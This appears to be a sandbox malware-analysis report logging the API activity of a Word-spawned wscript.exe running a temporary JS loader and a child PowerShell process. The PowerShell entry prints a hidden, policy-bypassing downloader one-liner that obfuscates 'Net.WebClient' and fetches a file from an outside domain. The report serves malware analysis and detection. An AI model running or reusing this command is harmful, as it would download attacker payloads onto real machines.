File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xbc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #17: wscript.exe

184

0

»

Information	Value
ID	#17
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:11, Reason: Child Process
Unmonitor	End Time: 00:01:19, Reason: Self Terminated
Monitor Duration	00:00:08

OS Process Information

»

Information	Value
PID	0xbb0
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BBC 0x B6C 0x B9C 0x B5C 0x C0 0x 888 0x 8BC 0x BA4 0x 154 0x 8EC

Threads

Thread 0xbbc

183

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:14 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 142148	1	Fn
System	Get Time	type = Performance Ctr, time = 19630544208	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff540000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:15 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 142943	1	Fn
System	Get Time	type = Performance Ctr, time = 19710117088	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 142959	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = ô	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:15 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 143380	1	Fn
System	Get Time	type = Performance Ctr, time = 19754809945	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:15 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 143396	1	Fn
System	Get Time	type = Performance Ctr, time = 19756051778	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 144316	1	Fn
System	Get Time	type = Ticks, time = 144675	1	Fn
System	Get Time	type = Ticks, time = 144753	1	Fn
System	Get Time	type = Ticks, time = 144956	3	Fn
System	Get Time	type = Ticks, time = 145065	4	Fn
System	Get Time	type = Ticks, time = 145080	4	Fn
System	Get Time	type = Ticks, time = 145190	3	Fn
System	Get Time	type = Ticks, time = 145205	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 145299	2	Fn
System	Get Time	type = Ticks, time = 145314	4	Fn
System	Get Time	type = Ticks, time = 145330	2	Fn
System	Get Time	type = Ticks, time = 145424	1	Fn
System	Get Time	type = Ticks, time = 145439	3	Fn
System	Get Time	type = Ticks, time = 145455	1	Fn
System	Get Time	type = Ticks, time = 145626	3	Fn
System	Get Time	type = Ticks, time = 145642	5	Fn
System	Get Time	type = Ticks, time = 145767	1	Fn
System	Get Time	type = Ticks, time = 145782	3	Fn
System	Get Time	type = Ticks, time = 145798	1	Fn
System	Get Time	type = Ticks, time = 145923	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:18 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 145938	1	Fn
System	Get Time	type = Performance Ctr, time = 20016612310	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff540000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xff54d7f8	1	Fn
System	Get Time	type = Ticks, time = 145938	1	Fn
COM	Get Class ID	cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.applicatiOn	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = Ticks, time = 146048	2	Fn
System	Get Time	type = Ticks, time = 146063	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0xb9c

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 2841184		1	Fn

Process #18: powershell.exe

343

0

»

Information	Value
ID	#18
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:11, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:14

OS Process Information

»

Information	Value
PID	0xbc4
Parent PID	0xba0 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BA8 0x B94 0x 6F4 0x 52C 0x B58 0x 81C 0x 3D4

Threads

Thread 0xba8

309

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	12	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
